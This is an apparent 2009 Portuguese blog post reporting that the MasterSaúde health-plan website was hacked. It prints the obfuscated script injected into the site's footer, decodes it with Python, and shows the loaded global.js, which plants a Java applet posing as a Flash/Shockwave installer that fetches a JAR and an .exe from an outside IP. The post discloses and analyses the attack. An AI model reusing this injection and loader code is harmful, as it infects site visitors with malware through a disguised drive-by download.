Arquivo

Archive for outubro \19\UTC 2009

Site da MasterSaúde hackeado.

outubro 19, 2009 Deixe um comentário

Hoje aconteceu algo curioso.

Estava eu fazendo pesquisas em sites de planos de saúde, quando entro no site da MasterSaúde (http://www.mastersaude.com.br), recebo uma mensagem que não possuo o Flash Player instalado, veja na figura:

site_mastersaude

WTF?? Tenho instalado o Flash Player, o que será?

Peguei o código fonte e dei uma vasculhada, mandei o pro Miguel di Ciurcio Filho (http://osysadmin.blogspot.com) pois ele já havia descoberto um worm no site da Vivo, então ele achou no rodapé o seguinte código:

<script type=”text/javascript”>
<!­­
document.write(unescape(“%3C%73%63%72%69%70%74%20%74%79%70%65%3D
%22%74%65%78%74%2F%6A
%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A
%2F%2F%32%30%34%2E%33%2E%31%35%36%2E%32%34%36%2F%6A%73%2F%67%6C
%6F%62%61%6C%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E”))
// ­­>
</script>

Descodificando com o Python:

imPython 2.6.2 (release26­maint, Apr 19 2009, 01:56:41)
[GCC 4.3.3] on linux2
Type “help”, “copyright”, “credits” or “license” for more information.
>>> import urllib
>>>
urllib.unquote(“%3C%73%63%72%69%70%74%20%74%79%70%65%3D
%22%74%65%78%74%2F%6A
%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A
%2F%2F%32%30%34%2E%33%2E%31%35%36%2E%32%34%36%2F%6A%73%2F%67%6C
%6F%62%61%6C%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E”)
‘<script type=”text/javascript”
src=”http://204.3.156.246/js/global.js”></script>&#8217;

Conteúdo do arquivo global.js:

/* Setar IP atual logo abaixo */
var url = “204.3.156.246”;
document.write(‘<applet name=”Seu Computador não possui Adobe Shockwave
Player clique em RUN para proseguir ­ ©Adobe Shockwave Player Version
11.5.0.600″ code=”Main.class” archive=”http://&#8217; + url +
‘/js/FlashPlayer.jar” height=”10″ width=”1″><param name=”link”
value=”http://&#8217; + url + ‘/js/install_flash_player_ax.exe”></applet>’);

Eeeeeta… site hackeado…

Anúncios
Categorias:Sites